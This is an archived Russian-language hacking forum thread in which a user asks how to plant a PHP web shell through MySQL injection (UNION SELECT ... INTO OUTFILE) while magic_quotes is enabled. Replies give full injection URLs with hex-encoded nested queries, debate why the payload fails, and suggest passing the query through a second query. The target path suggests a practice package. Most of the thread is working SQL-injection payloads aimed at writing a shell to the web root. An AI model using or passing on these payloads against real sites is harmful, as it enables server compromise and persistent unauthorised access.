PDA

Просмотр полной версии : Как обойти magic_quotes в outfile mysql?


MrHunter
27.03.2012, 18:07
Всем привет. Столкнулся с такой проблемой. Хочу залить шелл, но на сайте включен magic_quotes. То есть выполнить такой запрос я не могу

http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0X3C707

,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/

cyphor/shell.php'

Кто знает как решить проблему?

Expl0ited
27.03.2012, 18:08
Никак.

OxoTnik
27.03.2012, 18:11
твой запрос


http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0X3C707
,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/
cyphor/shell.php'


в него встраиваем внутренний запрос


-1 union select 0X3C707
,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/
cyphor/shell.php'


только в хексе


0x2d3120756e696f6e2073656c656374203058334337303720 2c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466 696c6520277573722f6c6f63616c2f6170616368652f687464 6f63732f7765626578706c6f69746174696f6e5f7061636b61 67655f30322f20637970686f722f7368656c6c2e706870


и должно быть что то вроде

http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0x2d3120756e696f6e2073656c656374203058334337303720 2c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466 696c6520277573722f6c6f63616c2f6170616368652f687464 6f63732f7765626578706c6f69746174696f6e5f7061636b61 67655f30322f20637970686f722f7368656c6c2e706870,nul l,null,null--

Вроде так можно

Expl0ited
27.03.2012, 18:25
Аннет, всётаки так нельзя, вложенный запрос не обработается, т.к. это не предусмотрено исполняемым скриптом, если опираться на первый пост.

OxoTnik
27.03.2012, 18:34
Expl0ited это из-за хекса нельзя, который у него в первом посте? или изза "null"?

MrHunter
27.03.2012, 18:42
твой запрос
в него встраиваем внутренний запрос
только в хексе
и должно быть что то вроде
http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0x2d3120756e696f6e2073656c656374203058334337303720 2c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466 696c6520277573722f6c6f63616c2f6170616368652f687464 6f63732f7765626578706c6f69746174696f6e5f7061636b61 67655f30322f20637970686f722f7368656c6c2e706870,nul l,null,null--
Вроде так можно


OxoTnik,не выходит. Когда делаю внутренний запрос (в хекс), то он воспринимается как строка, а не как запрос. Искал возможность через сохраненные процедуры, но тоже решения пока не нашел. Есть ли другие предложения?

Ereee
28.03.2012, 21:50
Expl0ited
это из-за хекса нельзя, который у него в первом посте? или изза "null"?


Путь юзать в хексе нельзя.

TC, ответ дали же. НИКАК.

Pirotexnik
13.04.2012, 11:05
Можно обойти, при условие, что запрос передается через переменную в другой запрос.

Точда кодируем в хекс и во втором запросе кавычки выполнятся нормально